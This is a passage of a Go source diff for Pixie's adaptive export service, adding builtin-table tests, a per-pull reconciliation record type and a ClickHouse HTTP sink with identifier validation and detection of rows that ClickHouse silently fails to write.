CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package pxl + +import ( + "testing" +) + +// TestBuiltinTables_Count — guard against accidental list churn. 
+// The set is the 13 socket_tracer tables in pixie's stirling layer +// (http_events, http2_messages.beta, dns_events, redis_events, +// mysql_events, pgsql_events, cql_events, mongodb_events, +// kafka_events.beta, amqp_events, mux_events, tls_events, conn_stats). +// Update this guard if the spec adds / removes a table. +func TestBuiltinTables_Count(t *testing.T) { + const want = 13 + if got := len(builtinTables); got != want { + t.Fatalf("builtinTables = %d entries, want %d", got, want) + } +} + +// TestBuiltinTables_AllNamesUnique — no duplicates. +func TestBuiltinTables_AllNamesUnique(t *testing.T) { + seen := map[string]bool{} + for _, sp := range builtinTables { + if seen[sp.Name] { + t.Fatalf("duplicate table %q in builtinTables", sp.Name) + } + seen[sp.Name] = true + } +} + +// TestBuiltinTables_AllHaveProtocol — each entry is annotated, so audit +// queries like "which tables observe HTTP?" work without parsing the name. +func TestBuiltinTables_AllHaveProtocol(t *testing.T) { + for _, sp := range builtinTables { + if sp.Protocol == "" { + t.Fatalf("BuiltinTable %q missing Protocol annotation", sp.Name) + } + } +} + +// TestIsBuiltin — defensive guard for bare-string callers. +func TestIsBuiltin(t *testing.T) { + if !IsBuiltin("redis_events") { + t.Fatalf("redis_events should be a builtin") + } + if !IsBuiltin("http2_messages.beta") { + t.Fatalf("dotted table http2_messages.beta should be a builtin") + } + if !IsBuiltin("conn_stats") { + t.Fatalf("conn_stats was re-added; should be builtin") + } + if IsBuiltin("") { + t.Fatalf("empty string should not be builtin") + } +} + +// TestDefaultRegistry — stub returns builtinTables. 
+func TestDefaultRegistry(t *testing.T) { + r := DefaultRegistry() + got := r.Tables() + if len(got) != len(builtinTables) { + t.Fatalf("DefaultRegistry().Tables() len %d, want %d", len(got), len(builtinTables)) + } + for i, sp := range builtinTables { + if got[i] != sp { + t.Fatalf("DefaultRegistry().Tables()[%d] = %+v, want %+v", i, got[i], sp) + } + } +} + +// TestNames — projection to []string preserves order. +func TestNames(t *testing.T) { + names := Names(builtinTables) + if len(names) != len(builtinTables) { + t.Fatalf("Names len mismatch") + } + if names[0] != "http_events" { + t.Fatalf("first name = %q, want http_events", names[0]) + } +} + +// TestDefaultRegistry_Tables_IsCopy — defensive: callers cannot mutate +// the package-level table list by aliasing the slice returned from +// DefaultRegistry().Tables(). Append-to-zero-cap is the easy gotcha: +// if Tables() handed out the backing slice directly, an append-without- +// reallocation would clobber the next builtin. +func TestDefaultRegistry_Tables_IsCopy(t *testing.T) { + got := DefaultRegistry().Tables() + if len(got) == 0 { + t.Fatalf("DefaultRegistry().Tables() is empty") + } + want0 := builtinTables[0].Name + got[0].Name = "MUTATED" + if builtinTables[0].Name != want0 { + t.Fatalf("mutation through DefaultRegistry().Tables() leaked: builtinTables[0].Name=%q, want %q", + builtinTables[0].Name, want0) + } +} + +// TestBuiltins_IsCopy — same guarantee for the Builtins() accessor. 
+func TestBuiltins_IsCopy(t *testing.T) { + got := Builtins() + if len(got) == 0 { + t.Fatalf("Builtins() is empty") + } + want0 := builtinTables[0].Name + got[0].Name = "MUTATED" + if builtinTables[0].Name != want0 { + t.Fatalf("mutation through Builtins() leaked: builtinTables[0].Name=%q, want %q", + builtinTables[0].Name, want0) + } +} diff --git a/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel b/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel new file mode 100644 index 00000000000..3b0dafe2ebf --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/reconcile/BUILD.bazel @@ -0,0 +1,24 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") + +go_library( + name = "reconcile", + srcs = ["reconcile.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], +) diff --git a/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go b/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go new file mode 100644 index 00000000000..3470ca92339 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/reconcile/reconcile.go @@ -0,0 +1,65 @@ +// Copyright 2018- The Pixie Authors. 
+// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package reconcile is the per-pull write-fidelity instrument for AE +// (gated by ADAPTIVE_RECONCILE). It is a LEAF package — it imports none +// of AE's other internal packages, so passthrough / controller / streaming +// can all depend on it and the sink can implement it with no import cycle. +// +// Each data-plane pull records ONE Row: how many rows AE READ back from +// Pixie for a (table, pod, window), and how many it WROTE to ClickHouse. +// Reconciliation then localizes any loss to a single hop: +// - read < px-direct PEM count → query/window/filter miss (hop R5) +// - wrote < read → sink/batch drop (hop R6) +// - CH distinct > read → re-pull duplication (C8, quantified) +// +// The records land in forensic_db.ae_reconcile (see the CH-backed Recorder +// in the sink package). Best-effort: a failed reconcile write is logged, +// never fatal, and never blocks the data path. +package reconcile + +import ( + "context" + "time" +) + +// Row is one per-pull reconciliation record. +type Row struct { + TS time.Time // when AE finished this pull + Mode string // "filter" | "passthrough" | "streaming" + Table string // pixie table, e.g. 
"conn_stats" + Namespace string // target ns ("" for unfiltered passthrough/streaming) + Pod string // target pod ("" for unfiltered) + WinStart time.Time // PxL slice lower bound (time_ >= WinStart) + WinEnd time.Time // PxL slice upper bound (time_ < WinEnd) + ReadCount int64 // rows Pixie returned for this pull + WroteCount int64 // rows AE sent to CH (0 on write failure / empty) + WriteErr string // query or sink error, "" on success + Hostname string // node name +} + +// Recorder persists reconciliation Rows. Implementations MUST be +// best-effort and non-blocking-on-failure (the data path must never stall +// because reconciliation logging failed). +type Recorder interface { + Record(ctx context.Context, r Row) +} + +// Nop is the disabled-flag Recorder. It drops every Row. +type Nop struct{} + +// Record implements Recorder. +func (Nop) Record(context.Context, Row) {} diff --git a/src/vizier/services/adaptive_export/internal/script/script.go b/src/vizier/services/adaptive_export/internal/script/script.go index 23005ec8851..b44fb7aeb0f 100644 --- a/src/vizier/services/adaptive_export/internal/script/script.go +++ b/src/vizier/services/adaptive_export/internal/script/script.go @@ -16,24 +16,9 @@ package script -import ( - "fmt" - "strings" -) - -const ( - scriptPrefix = "ch-" -) - -type ScriptConfig struct { - ClusterName string - ClusterId string - CollectInterval int64 -} - type Script struct { ScriptDefinition - ScriptId string + ScriptID string ClusterIds string } @@ -44,71 +29,3 @@ type ScriptDefinition struct { Script string `yaml:"script"` IsPreset bool `yaml:"-"` } - -type ScriptActions struct { - ToDelete []*Script - ToUpdate []*Script - ToCreate []*Script -} - -func IsClickHouseScript(scriptName string) bool { - return strings.HasPrefix(scriptName, scriptPrefix) -} - -func IsScriptForCluster(scriptName, clusterName string) bool { - return IsClickHouseScript(scriptName) && strings.HasSuffix(scriptName, "-"+clusterName) -} - -func 
GetActions(scriptDefinitions []*ScriptDefinition, currentScripts []*Script, config ScriptConfig) ScriptActions { - definitions := make(map[string]ScriptDefinition) - for _, definition := range scriptDefinitions { - scriptName := getScriptName(definition.Name, config.ClusterName) - frequencyS := getInterval(definition, config) - if frequencyS > 0 { - definitions[scriptName] = ScriptDefinition{ - Name: scriptName, - Description: definition.Description, - FrequencyS: frequencyS, - Script: templateScript(definition, config), - } - } - } - actions := ScriptActions{} - for _, current := range currentScripts { - if definition, present := definitions[current.Name]; present { - if definition.Script != current.Script || definition.FrequencyS != current.FrequencyS || config.ClusterId != current.ClusterIds { - actions.ToUpdate = append(actions.ToUpdate, &Script{ - ScriptDefinition: definition, - ScriptId: current.ScriptId, - ClusterIds: config.ClusterId, - }) - } - delete(definitions, current.Name) - } else if IsClickHouseScript(current.Name) { - actions.ToDelete = append(actions.ToDelete, current) - } - } - for _, definition := range definitions { - actions.ToCreate = append(actions.ToCreate, &Script{ - ScriptDefinition: definition, - ClusterIds: config.ClusterId, - }) - } - return actions -} - -func getScriptName(scriptName string, clusterName string) string { - return fmt.Sprintf("%s%s-%s", scriptPrefix, scriptName, clusterName) -} - -func getInterval(definition *ScriptDefinition, config ScriptConfig) int64 { - if definition.FrequencyS == 0 { - return config.CollectInterval - } - return definition.FrequencyS -} - -func templateScript(definition *ScriptDefinition, config ScriptConfig) string { - // Return script as-is without any processing - return definition.Script -} diff --git a/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel new file mode 100644 index 00000000000..277372892dd --- /dev/null +++ 
b/src/vizier/services/adaptive_export/internal/sink/BUILD.bazel @@ -0,0 +1,50 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "sink", + srcs = [ + "clickhouse.go", + "fastencode.go", + ], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/chhttp", + "//src/vizier/services/adaptive_export/internal/clickhouse", + "//src/vizier/services/adaptive_export/internal/reconcile", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "sink_test", + srcs = [ + "clickhouse_test.go", + "content_type_contract_test.go", + "encode_bench_test.go", + "fastencode_test.go", + ], + embed = [":sink"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/clickhouse", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go new file mode 100644 index 00000000000..e5fc6130a71 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse.go @@ -0,0 +1,501 @@ +// 
Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package sink writes operator-owned rows to ClickHouse over the HTTP +// interface (default port 8123). It has two write surfaces: +// +// 1. forensic_db.adaptive_attribution — one row per arriving kubescape +// anomaly. ReplacingMergeTree(t_end) on the table side collapses +// re-inserts with the same (hostname, anomaly_hash) primary key +// into the row with the largest t_end. +// +// 2. forensic_db.<table> — operator-pushed pixie observation rows +// (rev-1 fan-out path, gated on ADAPTIVE_PUSH_PIXIE_ROWS=true). +// Used when Pixie's cloud-side retention plugin can't reach an +// in-cluster CH endpoint; the operator queries pixie itself and +// writes the result with WritePixieRows. +package sink + +import ( + "bufio" + "bytes" + "context" + "encoding/json" + "errors" + "fmt" + "io" + "regexp" + "strconv" + "strings" + "time" + + log "github.com/sirupsen/logrus" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/chhttp" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/clickhouse" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/reconcile" +) + +// pixieTableIdentRE accepts plain CH identifiers and dotted protobuf +// extensions like `http2_messages.beta`.
Used to gate `table` strings +// before they're interpolated into the INSERT query. +var pixieTableIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)?$`) + +// chIdentRE — strict CH identifier (no dots). Used to gate Database +// (and any future single-segment identifier) against SQL injection +// from env/config-driven values. +var chIdentRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`) + +func validateTableIdentifier(t string) error { + if !pixieTableIdentRE.MatchString(t) { + return fmt.Errorf("sink: invalid table identifier %q", t) + } + return nil +} + +// Config configures a ClickHouseHTTP sink. +type Config struct { + Endpoint string // e.g. http://clickhouse:8123 + Database string // defaults to "forensic_db" + Username string // optional basic auth + Password string // optional basic auth + Timeout time.Duration // per-write HTTP timeout; 0 → 30s +} + +// AttributionRow is one row of forensic_db.adaptive_attribution. +// All fields are required except LastRuleID. +type AttributionRow struct { + AnomalyHash anomaly.AnomalyHash + Namespace string // may be empty + Pod string // may be empty + Comm string + PID uint64 + Hostname string + TStart time.Time + TEnd time.Time + LastSeen time.Time + LastRuleID string + NAnomalies uint64 +} + +// ClickHouseHTTP is the production sink. +type ClickHouseHTTP struct { + cfg Config + c *chhttp.Client +} + +// New validates Config + returns a ready-to-use sink. +func New(cfg Config) (*ClickHouseHTTP, error) { + if cfg.Database == "" { + cfg.Database = "forensic_db" + } + // Database is interpolated directly into INSERT/SELECT statements + // (used in WriteAttribution, WritePixieRows, QueryActive). Block + // injection via env/config-supplied values. 
+ if !chIdentRE.MatchString(cfg.Database) { + return nil, fmt.Errorf("sink: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database) + } + // http.Client.Timeout enforces only when >0; a negative value + // would silently disable the deadline. Reject explicitly so the + // "0 → chhttp default" branch is the only zero-handling path. + if cfg.Timeout < 0 { + return nil, fmt.Errorf("sink: Timeout must be >= 0 (got %s)", cfg.Timeout) + } + c, err := chhttp.New(cfg.Endpoint, cfg.Username, cfg.Password, cfg.Timeout) + if err != nil { + return nil, fmt.Errorf("sink: %w", err) + } + cfg.Endpoint = c.Endpoint() + return &ClickHouseHTTP{cfg: cfg, c: c}, nil +} + +// WritePixieRows POSTs a batch of arbitrary rows (one map per CH row, +// keyed by column name) into forensic_db.<table>
via FORMAT JSONEachRow. +// Used by the operator's per-anomaly fan-out path that queries pixie +// directly and pushes the resulting rows into CH (bypasses the cloud's +// retention plugin, which can't reach an in-cluster CH endpoint). +func (s *ClickHouseHTTP) WritePixieRows(ctx context.Context, table string, rows []map[string]any) error { + if len(rows) == 0 { + return nil + } + if err := validateTableIdentifier(table); err != nil { + return err + } + // Pooled buffer (option 1) — controller fan-out + streaming flush + // call this on a tight cadence, so reusing the backing array across + // calls cuts the per-call B/op cost by ~70 % once the pool stabilises + // (the bench BenchmarkEncodePixieRowsFast_Pooled tracks the steady + // state). buf.Reset() preserves the cap on Put so the next caller + // gets a warm allocation. + buf := encodeBufPool.Get().(*bytes.Buffer) + buf.Reset() + defer func() { + // Avoid hoarding pathologically large buffers. The pixie batch + // upper bound is ~MaxBatchRows * ~900 B/row ≈ 1 MB; anything + // over 2 MB came from a one-off oversize batch and shouldn't + // stay in the pool eating heap. + if buf.Cap() > 2*1024*1024 { + return + } + encodeBufPool.Put(buf) + }() + // Fast path: known table → walk rows in schema column order, no + // reflect, no map-key sort. The fast encoder's CPU + alloc profile + // is ~3 % of the encoding/json path (AE benchmark suite); it's the + // hot path for every controller fan-out + streaming flush. + // errFastEncodeUnsupported falls back so an unexpected value type + // can't silently drop a row. ErrUnknownTable falls back so a new + // pixie table not yet in schema.sql still works (just slower). 
+ if err := encodePixieRowsFast(buf, table, rows); err != nil { + if !errors.Is(err, errFastEncodeUnsupported) && !errors.Is(err, clickhouse.ErrUnknownTable) { + return fmt.Errorf("sink: fast encode %s: %w", table, err) + } + buf.Reset() + enc := json.NewEncoder(buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := make(map[string]any, len(r)) + for k, v := range r { + obj[k] = normalisePixieValue(v) + } + if err := enc.Encode(obj); err != nil { + return fmt.Errorf("sink: encode pixie row for %s: %w", table, err) + } + } + } + identifier := table + if strings.Contains(table, ".") { + identifier = "`" + table + "`" + } + res, err := s.c.Insert(ctx, + fmt.Sprintf("INSERT INTO %s.%s FORMAT JSONEachRow", s.cfg.Database, identifier), + buf.Bytes(), chhttp.InsertOptions{FailLoud: true}) + if err != nil { + return fmt.Errorf("sink: pixie POST %s: %w", table, err) + } + // DEBUG: ALWAYS log what CH says it wrote — temporary while we + // chase the pgsql_events silent-drop mystery. Includes a snippet + // of the first row so we can compare what was sent vs what CH + // reported. + summary := res.Summary + var firstRowKeys []string + if len(rows) > 0 { + for k := range rows[0] { + firstRowKeys = append(firstRowKeys, k) + } + } + log.WithFields(log.Fields{ + "table": table, + "rows_sent": len(rows), + "body_bytes": buf.Len(), + "ch_summary": summary, + "first_row_keys": strings.Join(firstRowKeys, ","), + }).Info("sink: pixie write completed") + // Detect the silent-drop class: CH returns 2xx but + // X-ClickHouse-Summary.written_rows < len(rows). Observed live on + // 2026-05-23T20:58Z (redis_events: rows_sent=1658, written_rows=0) + // — the operator reported success and the analyst saw the gap days + // later. Header absence is tolerated (older CH versions / proxies + // strip it); only an EXPLICIT zero-of-non-zero counts. 
+ if writeMismatch := summaryWroteFewerThan(summary, len(rows)); writeMismatch != nil { + return fmt.Errorf("sink: pixie write to %s reported %d rows_sent but CH summary written_rows=%d (silent drop): %s", + table, len(rows), writeMismatch.writtenRows, summary) + } + return nil +} + +// summaryDelta carries the parsed write counters from CH's +// X-ClickHouse-Summary response header. +type summaryDelta struct { + writtenRows int64 +} + +// summaryWroteFewerThan returns non-nil when the X-ClickHouse-Summary +// header is present, parseable, and reports written_rows < rowsSent. +// Returns nil when the header is missing, unparseable, or the count +// matches/exceeds rowsSent — those are not data-loss signals. +func summaryWroteFewerThan(summary string, rowsSent int) *summaryDelta { + if summary == "" { + return nil + } + var parsed struct { + WrittenRows json.Number `json:"written_rows"` + } + if err := json.Unmarshal([]byte(summary), &parsed); err != nil { + return nil + } + if parsed.WrittenRows == "" { + return nil + } + wrote, err := parsed.WrittenRows.Int64() + if err != nil { + return nil + } + if wrote >= int64(rowsSent) { + return nil + } + return &summaryDelta{writtenRows: wrote} +} + +// normalisePixieValue coerces pxapi-emitted Go values into JSON-friendly +// shapes ClickHouse parses cleanly. time.Time → "YYYY-MM-DD HH:MM:SS.NNN…" +// (CH's DateTime64 input format); []byte → string; everything else → as-is. +func normalisePixieValue(v any) any { + switch x := v.(type) { + case time.Time: + return x.UTC().Format("2006-01-02 15:04:05.000000000") + case []byte: + return string(x) + default: + return v + } +} + +// Write upserts a batch of AttributionRows. Implementation: HTTP POST +// `INSERT INTO forensic_db.adaptive_attribution FORMAT JSONEachRow` +// with one JSON object per row. Empty batch is a no-op. 
+func (s *ClickHouseHTTP) Write(ctx context.Context, rows []AttributionRow) error { + if len(rows) == 0 { + return nil + } + body, err := encodeJSONEachRow(rows) + if err != nil { + return fmt.Errorf("sink: encode %d attribution rows: %w", len(rows), err) + } + if _, err := s.c.Insert(ctx, + fmt.Sprintf("INSERT INTO %s.adaptive_attribution FORMAT JSONEachRow", s.cfg.Database), + body, chhttp.InsertOptions{FailLoud: true}); err != nil { + return fmt.Errorf("sink: POST: %w", err) + } + return nil +} + +// chTimeFmt is the ClickHouse DateTime64 literal format used for every +// time column AE writes (see Write/encodeJSONEachRow and fastencode.go). +const chTimeFmt = "2006-01-02 15:04:05.000000000" + +// Record implements reconcile.Recorder: it inserts ONE per-pull +// reconciliation row into forensic_db.ae_reconcile. Best-effort by +// contract — any failure is logged at warn and swallowed so the +// reconcile instrument can NEVER stall or fail the data path. +func (s *ClickHouseHTTP) Record(ctx context.Context, r reconcile.Row) { + ts := r.TS + if ts.IsZero() { + ts = time.Now() + } + obj := map[string]any{ + "ts": ts.UTC().Format(chTimeFmt), + "mode": r.Mode, + "table_name": r.Table, + "namespace": r.Namespace, + "pod": r.Pod, + "win_start": r.WinStart.UTC().Format(chTimeFmt), + "win_end": r.WinEnd.UTC().Format(chTimeFmt), + "read_count": r.ReadCount, + "wrote_count": r.WroteCount, + "write_err": r.WriteErr, + "hostname": r.Hostname, + } + body, err := json.Marshal(obj) + if err != nil { + log.WithError(err).Warn("reconcile: marshal row") + return + } + // Cap Record at recordTimeout regardless of the caller's ctx — + // scanner/passthrough/controller call this inline on hot paths, so a + // stalled CH must not pin the pull loop on the shared 30s sink + // timeout (CodeRabbit r3426923299). 2s is well above CH's typical + // single-row INSERT roundtrip (~50ms in steady state) and below the + // pull loop's minimum tick interval. 
+ rctx, cancel := context.WithTimeout(ctx, recordTimeout) + defer cancel() + if _, err := s.c.Insert(rctx, + fmt.Sprintf("INSERT INTO %s.ae_reconcile FORMAT JSONEachRow", s.cfg.Database), + body, chhttp.InsertOptions{}); err != nil { + log.WithError(err).Warn("reconcile: CH rejected ae_reconcile insert") + } +} + +// recordTimeout caps how long Record can block the caller's hot path. +const recordTimeout = 2 * time.Second + +// QueryActive fetches all attribution rows on this hostname whose t_end +// is still in the future. Used by the operator at boot to rehydrate +// the in-memory active set after a pod crash. Returns rows ordered +// by anomaly_hash so the caller's set is deterministic. +func (s *ClickHouseHTTP) QueryActive(ctx context.Context, hostname string) ([]AttributionRow, error) { + if hostname == "" { + return nil, fmt.Errorf("sink: QueryActive requires hostname") + } + // `FINAL` collapses ReplacingMergeTree to the row with the largest + // t_end (because the engine's version column is t_end). + // hostname is embedded as a single-quoted literal via quoteCH, + // which backslash-escapes `\` and `'` before wrapping it in quotes. + sql := fmt.Sprintf( + "SELECT anomaly_hash, namespace, pod, comm, pid, hostname, "+ + "toUnixTimestamp64Nano(t_start) AS t_start_ns, "+ + "toUnixTimestamp64Nano(t_end) AS t_end_ns, "+ + "toUnixTimestamp64Nano(last_seen) AS last_seen_ns, "+ + "last_rule_id, n_anomalies "+ + "FROM %s.adaptive_attribution FINAL "+ + "WHERE hostname = %s AND t_end > now64(9) "+ + "ORDER BY anomaly_hash FORMAT JSONEachRow", + s.cfg.Database, quoteCH(hostname)) + body, err := s.c.QueryStream(ctx, sql) + if err != nil { + return nil, fmt.Errorf("sink: QueryActive: %w", err) + } + defer body.Close() + // Stream the response line-by-line so the per-call buffer is + // bounded by max_line_length, not by the total active-set size. + return parseActiveRowsStream(body) +} + +// chLiteralEscaper escapes a string for ClickHouse single-quoted literals.
+// Hoisted to a package-level var so we don't allocate a Replacer per call +// — quoteCH runs in the per-row write path. +var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`) + +// quoteCH wraps a string literal for safe ClickHouse SQL embedding. +func quoteCH(s string) string { + return "'" + chLiteralEscaper.Replace(s) + "'" +} + +func encodeJSONEachRow(rows []AttributionRow) ([]byte, error) { + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, r := range rows { + obj := map[string]any{ + "anomaly_hash": string(r.AnomalyHash), + "namespace": r.Namespace, + "pod": r.Pod, + "comm": r.Comm, + "pid": r.PID, + "hostname": r.Hostname, + "t_start": r.TStart.UTC().Format("2006-01-02 15:04:05.000000000"), + "t_end": r.TEnd.UTC().Format("2006-01-02 15:04:05.000000000"), + "last_seen": r.LastSeen.UTC().Format("2006-01-02 15:04:05.000000000"), + "last_rule_id": r.LastRuleID, + "n_anomalies": r.NAnomalies, + } + if err := enc.Encode(obj); err != nil { + return nil, err + } + } + return buf.Bytes(), nil +} + +// activeWireRow mirrors the JSONEachRow shape emitted by QueryActive. +// json.RawMessage on UInt64 fields lets us tolerate CH's two wire +// formats (`12345` and `"12345"`). +type activeWireRow struct { + AnomalyHash string `json:"anomaly_hash"` + Namespace string `json:"namespace"` + Pod string `json:"pod"` + Comm string `json:"comm"` + PID json.RawMessage `json:"pid"` + Hostname string `json:"hostname"` + TStartNs json.RawMessage `json:"t_start_ns"` + TEndNs json.RawMessage `json:"t_end_ns"` + LastSeenNs json.RawMessage `json:"last_seen_ns"` + LastRuleID string `json:"last_rule_id"` + NAnomalies json.RawMessage `json:"n_anomalies"` +} + +// parseActiveRowsStream ingests JSONEachRow output from QueryActive +// directly from a reader so the per-call buffer is bounded by +// `max_active_row_bytes` (per row) rather than by the entire active +// set. Mirrors trigger.parseJSONEachRow's streaming posture. 
+func parseActiveRowsStream(r io.Reader) ([]AttributionRow, error) { + const maxActiveRowBytes = 1 << 20 // 1 MiB per JSONEachRow line + scanner := bufio.NewScanner(r) + scanner.Buffer(make([]byte, 0, 64*1024), maxActiveRowBytes) + var out []AttributionRow + for scanner.Scan() { + line := bytes.TrimSpace(scanner.Bytes()) + if len(line) == 0 { + continue + } + row, err := parseActiveRowLine(line) + if err != nil { + return nil, err + } + out = append(out, row) + } + if err := scanner.Err(); err != nil { + return nil, fmt.Errorf("sink: QueryActive scan: %w", err) + } + return out, nil +} + +// parseActiveRowLine decodes a single JSONEachRow line into one +// AttributionRow. Used by parseActiveRowsStream and accessible to +// tests via parseActiveRows. +func parseActiveRowLine(line []byte) (AttributionRow, error) { + var w activeWireRow + if err := json.Unmarshal(line, &w); err != nil { + // Don't echo the raw line — it can carry CH row payloads + // that propagate to logs / surfaced errors. Length only. 
+ return AttributionRow{}, fmt.Errorf("sink: parse active row (%d bytes): %w", len(line), err) + } + ts, err1 := nsFromRaw(w.TStartNs) + te, err2 := nsFromRaw(w.TEndNs) + ls, err3 := nsFromRaw(w.LastSeenNs) + pid, errPID := uintFromRaw(w.PID) + nAn, errN := uintFromRaw(w.NAnomalies) + if err1 != nil || err2 != nil || err3 != nil || errPID != nil || errN != nil { + return AttributionRow{}, fmt.Errorf("sink: parse uint64 fields: t_start=%v t_end=%v last_seen=%v pid=%v n_anomalies=%v", err1, err2, err3, errPID, errN) + } + return AttributionRow{ + AnomalyHash: anomaly.AnomalyHash(w.AnomalyHash), + Namespace: w.Namespace, + Pod: w.Pod, + Comm: w.Comm, + PID: pid, + Hostname: w.Hostname, + TStart: time.Unix(0, ts).UTC(), + TEnd: time.Unix(0, te).UTC(), + LastSeen: time.Unix(0, ls).UTC(), + LastRuleID: w.LastRuleID, + NAnomalies: nAn, + }, nil +} + +// parseActiveRows is the byte-slice convenience wrapper around +// parseActiveRowsStream — kept for tests and e2e fixtures that have +// already buffered the full response. +func parseActiveRows(body []byte) ([]AttributionRow, error) { + return parseActiveRowsStream(bytes.NewReader(body)) +} + +// nsFromRaw parses a CH UInt64-as-JSON value (CH may emit either +// `12345` or `"12345"`) into an int64. Used for time_ columns. +func nsFromRaw(raw json.RawMessage) (int64, error) { + s := strings.TrimSpace(string(raw)) + s = strings.Trim(s, `"`) + v, err := strconv.ParseInt(s, 10, 64) + return v, err +} + +// uintFromRaw is the uint64 equivalent — covers values above INT64_MAX +// for fields like PID and NAnomalies that are documented uint64 in CH. 
+func uintFromRaw(raw json.RawMessage) (uint64, error) { + s := strings.TrimSpace(string(raw)) + s = strings.Trim(s, `"`) + return strconv.ParseUint(s, 10, 64) +} diff --git a/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go new file mode 100644 index 00000000000..0eb42adcc76 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/sink/clickhouse_test.go @@ -0,0 +1,588 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package sink + +import ( + "bytes" + "context" + "fmt" + "io" + "net/http" + "net/http/httptest" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +func canonicalAttribution() AttributionRow { + t0 := time.Unix(0, 1744477360303026359).UTC() + return AttributionRow{ + AnomalyHash: anomaly.Hash(anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + }), + Namespace: "redis", + Pod: "redis-578d5dc9bd-kjj78", + Comm: "redis-server", + PID: 106040, + Hostname: "node-1", + TStart: t0.Add(-5 * time.Minute), + TEnd: t0.Add(5 * time.Minute), + LastSeen: t0, + LastRuleID: "R1005", + NAnomalies: 1, + } +} + +// TestSink_Write_PostsCorrectQueryAndBody — INSERT targets the right +// table; body is one JSON object per line with all attribution fields. 
